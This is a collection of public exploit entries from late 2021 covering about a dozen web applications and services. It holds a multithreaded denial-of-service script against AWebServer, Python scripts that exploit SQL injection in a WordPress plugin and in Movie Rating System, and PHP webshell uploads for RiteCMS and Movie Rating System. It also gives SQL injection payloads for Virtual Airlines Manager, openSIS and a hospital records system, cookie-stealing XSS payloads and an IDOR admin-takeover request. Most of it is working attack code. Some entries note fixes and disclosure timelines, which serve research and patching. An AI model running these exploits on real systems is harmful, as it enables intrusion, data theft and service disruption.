# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS) # Date: 28/12/2021 # Exploit Author: Andres Ramos [Invertebrado] # Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm # Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en # Version: AWebServer GhostBuilding 18 # Tested on: Android #!/usr/bin/python3 # ********************************************************************************* # * Author: Andres Ramos [Invertebrado] * # * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash * # ********************************************************************************* import signal import requests from pwn import * #Colors class colors(): GREEN = "\033[0;32m\033[1m" END = "\033[0m" RED = "\033[0;31m\033[1m" BLUE = "\033[0;34m\033[1m" YELLOW = "\033[0;33m\033[1m" PURPLE = "\033[0;35m\033[1m" TURQUOISE = "\033[0;36m\033[1m" GRAY = "\033[0;37m\033[1m" exit = False def def_handler(sig, frame): print(colors.RED + "\n[!] Exiting..." + colors.END) exit = True sys.exit(0) if threading.activeCount() > 1: os.system("tput cnorm") os._exit(getattr(os, "_exitcode", 0)) else: os.system("tput cnorm") sys.exit(getattr(os, "_exitcode", 0)) signal.signal(signal.SIGINT, def_handler) if len(sys.argv) < 3: print(colors.RED + "\n[!] 
Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END) sys.exit(1) url = sys.argv[1] Tr = sys.argv[2] def http(): counter = 0 p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END) while True: r = requests.get(url) r = requests.get(url + "/mysqladmin") counter += 2 p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END) if exit: break if __name__ == '__main__': threads = [] try: for i in range(0, int(Tr)): t = threading.Thread(target=http) threads.append(t) sys.stderr = open("/dev/null", "w") for x in threads: x.start() for x in threads: x.join() except Exception as e: log.failure(str(e)) sys.exit(1)
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) # Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" # Date: 30/12/2021 # Exploit Author: Malcrove # Vendor Homepage: https://www.beyondtrust.com/ # Version: v6.0 and earlier versions Summary: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allows remote attackers to inject arbitrary web script or HTML. Remote attackers could achieve full admin access to the appliance by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. Vulnerability Details: Affected Endpoint: /appliance/login Affected Parameter: login[password] Request Method: GET or POST Proof of concept (POC): By navigating to the below link from a modern web browser, the alert(document.domain) Javascript method would be fired in the same context as the Beyondtrust Remote Support domain. http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password Mitigation: A fix has been released by the vendor in NSBase 6.1. It is recommended to update the vulnerable appliance base version to the latest version. - Time-Line: April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust) April 8, 2021: Received an initial reply from the vendor Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1 Dec 30, 2021: Responsible public disclosure - Credits Ahmed Aboul-Ela (Malcrove)

TRIGONE Remote System Monitor 3.61 - Unquoted Service Path

# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.trigonesoft.com/
# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe
# Tested Version: 3.61
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

TRIGONE Remote System Monitor Server    RemoteSystemMonitorService    C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe    Auto

C:\>sc qc RemoteSystemMonitorService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RemoteSystemMonitorService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TRIGONE Remote System Monitor Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Note: the service is AUTO_START and runs as LocalSystem, so a binary planted on one of the
# paths Windows tries before the real one (C:\Program.exe, C:\Program Files\TRIGONE\Remote.exe,
# C:\Program Files\TRIGONE\Remote System.exe, ...) executes as SYSTEM on the next service start.
# Exploitation still requires write access to C:\ or C:\Program Files\TRIGONE\, which standard
# users do not have by default; the unquoted path is only exploitable where those directory ACLs
# have been weakened.

Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
# Date: 2021-12-30
# Exploit Author: Milad Karimi
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Ubuntu 19.04

All of the following are GET parameters of index.php; [SQLi] marks the injection point.

[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]

[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]

[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]

[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]

[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]

[7] Vulnerable GET parameter: registry_id=[SQLi] (same endpoint and parameter as [3])
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]

[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]

openSIS Student Information System 8.0 - 'multiple' SQL Injection

# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection
# Date: 26/12/2021
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://opensis.com
# Software Link: https://opensis.com
# Version: 8.0 Community Edition
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com

'''
DESCRIPTION

A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER[SCHOOL]" parameters of the POST request sent to /TransferredOutModal.php.

The vulnerability is found in the "student_id" and "TRANSFER[SCHOOL]" parameters of the POST request sent to the page /TransferredOutModal.php.

Example:
POST /TransferredOutModal.php?modfunc=detail
Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5

If an attacker exploits this vulnerability, the attacker may access private data in the database system.

Note: the captured request carries a session cookie, so exploitation presumably requires an authenticated session - confirm on the target.

EXPLOITATION

POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: localhost
User-Agent: user-agent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cookie
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5

Example sqlmap Command:
sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs

Example Payloads:

Payload1:
student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

Payload2:
student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

Payload3:
student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

ABOUT SECURITY FOR EVERYONE TEAM

We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveryone.com where everyone can test their website security and get help to fix their vulnerabilities.

We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
'''

RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)

# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Google Dork: intext:"Powered by RiteCMS"
# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597

"""
################
# Description #
################

# RiteCMS version 3.1.0 and below suffers from remote code execution in the admin panel. An authenticated attacker can upload a PHP file and bypass the .htaccess configuration that, by default, denies execution of .php files in the media and files directories.

# There are 4 ways of bypassing the current file upload protection to achieve remote code execution:

# Method 1: Delete the .htaccess file in the media and files directory through the file manager module and then upload the PHP file - RCE achieved

# Method 2: Rename the .php file extension to .pHp (or any capitalisation other than ".php"), e.g. shell.pHp, and upload the shell.pHp file - RCE achieved

# Method 3: Chain with the Arbitrary File Overwrite vulnerability by uploading the .php file to the web root, because .php execution is allowed in the web root - RCE achieved
By default, the attacker can only upload images into the media and files directories - Arbitrary File Overwrite vulnerability.
Intercept the request, modify the file_name param and place the payload "../webrootExec.php" to upload the PHP file to the web root

body= Content-Disposition: form-data; name="file_name"
body= ../webrootExec.php

So, the webshell can be accessed in the web root via http://localhost/ritecms.v3.1.0/webrootExec.php

# Method 4: Upload a new .htaccess to overwrite the old one with content like below, allowing access to one specific PHP file named "webshell.php", then upload the PHP webshell.php - RCE achieved

$ cat .htaccess
<Files *.php>
deny from all
</Files>
<Files ~ "webshell\.php$">
Allow from all
</Files>

# All four methods share one root cause: the upload handler trusts the client-supplied file name and extension. A server-side fix needs an allow-list of extensions compared case-insensitively, rejection of path separators in file_name, and .htaccess treated as a name that cannot be uploaded or deleted.

###################################
# PoC for webshell using Method 2 #
###################################

Steps to Reproduce:
1. Login as admin
2. Go to Files Manager
3. Choose a directory to upload the .php file to, either the media or the files directory.
4. Then, click Upload file > Browse..
5. Upload a .php file with the extension pHp, e.g. webshell.pHp - to bypass .htaccess
6. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you chose the media directory; otherwise switch to the files directory

Request:
========
POST /ritecms.v3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309
Content-Length: 1744
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="mode"

filemanager
-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($_GET[base64_decode('Y21k')]);?> -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file_name" -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_mode" 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize" 150 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_compression" 70 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_file_submit" OK - Upload file -----------------------------410923806710384479662671954309-- #################### # Webshell access: # #################### # Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id # Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """

WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection

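# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
# Date 22/12/2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.plugins-market.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
# Version: <= 4.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24750
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md

'''
Description:
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,
available to any authenticated user, which could allow users with a role as low as
subscriber to perform SQL injection attacks.

Usage:
    python3 exploit.py -T <host> -P <port> -U /<wordpress-dir>/ -u <user> -p <pass> -C "<sql>"

The -C value is placed right after a single quote inside the JSON "refUrl" value, i.e. it
continues the SQL string literal that the vulnerable query builds from refUrl.
'''

import argparse
import sys
from datetime import datetime

import requests

# Banner:
banner = r'''
 ___  _  _  ____     ___   ___   ___   __      ___   __   ___   ___   ___
/ __)( \/ )( ___)___(__ \ / _ \ (__ \ /  )___(__ \ /. | (__ )| __) / _ \
( (__  \  /  )__)(___)/ _/( (_) ) / _/  )((___)/ _/(_  _) / /  |__ \( (_) )
\___)  \/  (____)    (____)\___/ (____)(__)   (____) (_)  (_/   (___/ \___/

[+] WP Visitor Statistics SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''


def normalize_wp_path(wp_path):
    """Return *wp_path* with a leading and a trailing slash so it can sit between host and file."""
    if not wp_path.startswith('/'):
        wp_path = '/' + wp_path
    if not wp_path.endswith('/'):
        wp_path = wp_path + '/'
    return wp_path


def login(session, base, wp_path, username, password):
    """Log *session* into WordPress at base+wp_path; return True if a login cookie was set.

    refDetails is only reachable by an authenticated user (any role), so the
    exploit must not proceed on a failed login; the original script ignored the
    login result and fired the injection anyway.
    """
    auth_url = base + wp_path + 'wp-login.php'
    session.get(auth_url)  # priming request, as in the original
    header = {
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
        # Origin now carries the port; Host is left to requests so it carries the port too
        # (the original sent Host/Origin without the port).
        'Origin': base,
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }
    body = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'testcookie': '1',
    }
    session.post(auth_url, headers=header, data=body)
    # WordPress marks a successful login with a wordpress_logged_in_<hash> cookie.
    return any(name.startswith('wordpress_logged_in_') for name in session.cookies.keys())


def exploit(session, base, wp_path, command):
    """Send the injected refDetails request and return the raw response body.

    The payload goes through ``params`` so characters such as '&', '#' or spaces
    in *command* are percent-encoded instead of corrupting the query string, and
    the WordPress path given with -U is honoured (the original hard-coded
    /wordpress/ here while using -U for the login).
    """
    ajax_url = base + wp_path + 'wp-admin/admin-ajax.php'
    params = {
        'action': 'refDetails',
        # the single quote terminates the string literal in the plugin's query
        'requests': '{"refUrl":"' + "' " + command + '"}',
    }
    return session.get(ajax_url, params=params).text


def main():
    """Parse the command line, authenticate, fire the injection and print the response."""
    print(banner)

    # User-Input:
    my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
    my_parser.add_argument('-T', '--IP', type=str, required=True, help='target host')
    my_parser.add_argument('-P', '--PORT', type=str, required=True, help='target port')
    my_parser.add_argument('-U', '--PATH', type=str, required=True, help='WordPress path, e.g. /wordpress/')
    my_parser.add_argument('-u', '--USERNAME', type=str, required=True, help='WordPress user (subscriber is enough)')
    my_parser.add_argument('-p', '--PASSWORD', type=str, required=True, help='password of that user')
    my_parser.add_argument('-C', '--COMMAND', type=str, required=True, help='SQL placed after the single quote')
    args = my_parser.parse_args()

    base = 'http://' + args.IP + ':' + args.PORT
    wp_path = normalize_wp_path(args.PATH)

    print('')
    print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
    print('')

    session = requests.Session()
    if not login(session, base, wp_path, args.USERNAME, args.PASSWORD):
        print('[-] Login failed: no wordpress_logged_in_ cookie received, check -u/-p and -U')
        sys.exit(1)

    print(exploit(session, base, wp_path, args.COMMAND))
    print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))


if __name__ == '__main__':
    main()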

Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

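# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu

# This exploit only works correctly if the application's database user is the database
# administrator (it needs the FILE privilege for INTO OUTFILE, and secure_file_priv must not
# block the web root). If not, continue with ordinary SQL injection payloads instead.
# It also relies on PHP warnings being displayed, since the web root is read from one.

import re
import secrets
import string
import sys

import requests
from bs4 import BeautifulSoup

PAYLOAD = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
MOVIE_CARD_CLASS = "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"


def normalize_url(url):
    """Return *url* with an http:// scheme and a trailing slash, as the rest of the script expects."""
    if not url.startswith('http://') and not url.startswith('https://'):
        url = "http://" + url
    if not url.endswith('/'):
        url = url + "/"
    return url


def random_shell_name(length=15):
    """Return a random lowercase name so the dropped file does not collide with an existing one."""
    return ''.join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def find_movie_list_page(html):
    """Return the (./-stripped) href of the first nav-link whose text mentions 'movie', or None."""
    parser = BeautifulSoup(html, 'html.parser')
    for link in parser.findAll("a", {"class": "nav-link"}):
        if "movie" in link.text.lower():
            return link["href"].replace("./", "")
    return None


def find_first_movie_page(html):
    """Return the (./-stripped) href of the first movie card on the listing page, or None."""
    parser = BeautifulSoup(html, 'html.parser')
    cards = parser.findAll("a", {"class": MOVIE_CARD_CLASS})
    if not cards:
        return None
    return cards[0]["href"].replace("./", "")


def extract_webroot(html):
    """Recover the web root directory from the PHP warning leaked by a broken query.

    Expects display_errors to be on, so *html* contains something like
    ``<b>Warning</b>: ... in <b>/path/to/script.php</b> on line N``. Both '/'
    and '\\' are accepted as separators so the result is right on Linux as well
    as Windows (the original only split on backslashes, which on Linux yielded
    an empty path and a file written relative to the MySQL data directory).
    Returns the directory with a trailing separator, or None if no warning is found.
    """
    start = html.find("<b>Warning</b>: ")
    end = html.find("</b> on line ")
    if start == -1 or end == -1 or end < start:
        return None
    warning = html[start + len("<b>Warning</b>: "):end]
    file_marker = warning.find("<b>")
    if file_marker == -1:
        return None
    script_path = warning[file_marker + 3:]
    parts = re.split(r"[\\/]", script_path)
    parts.pop()  # drop the script file name, keep its directory
    return "".join(part + "/" for part in parts)


def build_injection(webroot, shell_name, payload=PAYLOAD):
    """Return the SQLi suffix that writes *payload* to <webroot><shell_name>.php via INTO OUTFILE.

    The PHP source is passed as a hex literal so no quotes are needed inside the
    query. The author's "0x3" prefix is kept as-is: MySQL pads an odd-length 0x
    literal with a leading zero, so the file starts with a 0x03 byte before
    "<?php" - presumably deliberate and harmless to PHP; verify if the shell
    does not execute.
    """
    outfile = webroot + shell_name + ".php"
    hex_payload = "0x3" + payload.encode("utf-8").hex()
    return ("-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '" + outfile
            + "' LINES TERMINATED BY " + hex_payload + " -- -")


def main():
    """Walk from the front page to an injectable movie page, drop the shell and run whoami."""
    url = normalize_url(input("TARGET = "))
    shell_name = random_shell_name()

    listing = find_movie_list_page(requests.get(url).text)
    if listing is None:
        sys.exit("[-] Could not find the movie listing link in the navigation bar")
    movie_page = find_first_movie_page(requests.get(url + listing).text)
    if movie_page is None:
        sys.exit("[-] No movie entries found; at least one is needed to reach the injectable page")
    sql_page = url + movie_page

    print("\nFinding path")
    # A stray quote breaks the query; the resulting PHP warning leaks the script path.
    webroot = extract_webroot(requests.get(sql_page + "'").text)
    print("injection page: " + sql_page)
    if webroot is None:
        sys.exit("[-] No PHP warning in the response (display_errors off?); cannot derive the web root")
    print("\nFound Path : " + webroot)

    print("\n\nShell Uploading...")
    requests.get(sql_page + build_injection(webroot, shell_name))
    shell_url = url + shell_name + ".php"
    shell_output = requests.get(shell_url, params={"tago": "whoami"})
    if shell_output.status_code != 200:
        sys.exit("[-] Shell not reachable at " + shell_url
                 + " (INTO OUTFILE failed: FILE privilege / secure_file_priv / path?)")
    print("\n\nShell Output : " + shell_output.text)
    print("\nShell Path : " + shell_url)


if __name__ == "__main__":
    main()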
# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 03-OCT-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: V 1.0
# Tested on: WAMPP

# Description
# Library System in PHP V1.0 is vulnerable to stored cross-site scripting because user-supplied data is stored and rendered without sanitisation or output encoding.

# Proof of Concept (PoC):
#Exploit:
1) Go to: http://localhost/library-system/dashboard.php
2) Log in as admin using the test credentials: admin/admin
3) Go to: http://localhost/library-system/update-publisher.php?pid=12
4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script>
5) Click Save
6) The payload is stored and fires when the page is rendered

SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)

# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) # Date: 28/12/2021 # Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc) # Vendor Homepage: https://www.safarimontage.com/ # Version: 8.3 and 8.5 # Tested on: Ubuntu Linux [Firefox] # CVE: CVE-2021-45425 # Proof of Concept: GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1 Host: vulnIP Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=SSSION; lang=en Connection: close

Hostel Management System 2.1 - Cross Site Scripting (XSS)

# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS)
# Date: 26/12/2021
# Exploit Author: Chinmay Vishwas Divekar
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Tested on: PopOS_20.10

*Steps to reproduce*
1) Open the book-hostel page using the following URL: https://localhost/hostel/book-hostel.php
2) Enter the XSS payload <img src=x onerror=alert(String.fromCharCode(88,83,83));> in the input fields listed below.
3) The server accepts the payload unsanitised in these input fields.

Affected input fields: Correspondence Address, Guardian Relation, Permanent Address
# Exploit Title: Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list.

*Attack Vector*
An attacker can compromise the database of the application using automated (or manual) tools such as SQLmap.

*Steps to reproduce:*
Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL:
http://localhost/hprms/admin/?page=patients/view_patient&id=1

Step-2: Put the SQL injection payload in the 'id' parameter.
time-based blind payload :
page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY

Step-3: The target server accepts the payload and the response is delayed by 5 seconds, confirming the injection.
# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

*Insecure direct object references (IDOR)*
Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input. Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users or files on the system.

*Attack Vector*
An attacker with any account can take over the Administrator's account: the save handler at /hprms/classes/Users.php?f=save updates whichever user id the client supplies, without checking that it matches the logged-in user.

*Steps to reproduce:*
Note: in this case we used two users: user1, a staff account with user id '4', and admin, an Administrator with user id '1'.
===================================================================================================================================== Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account' http://localhost/hprms/admin/?page=user ===================================================================================================================================== Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite: POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id" 4 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname" user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname" admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------17632878732301879013646251239-- ===================================================================================================================================== 
Step-3: Change parameter id '4' to id '1'

POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"

1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"

user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"

admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------17632878732301879013646251239--
=====================================================================================================================================
Step-4: Click 'Forward' in Burp Suite. The admin record (id 1) now carries user1's chosen username and password, so user1 can log in as an Administrator.

Fix: the save handler must take the user id from the server-side session (or verify the submitted id matches it) instead of trusting the request parameter.
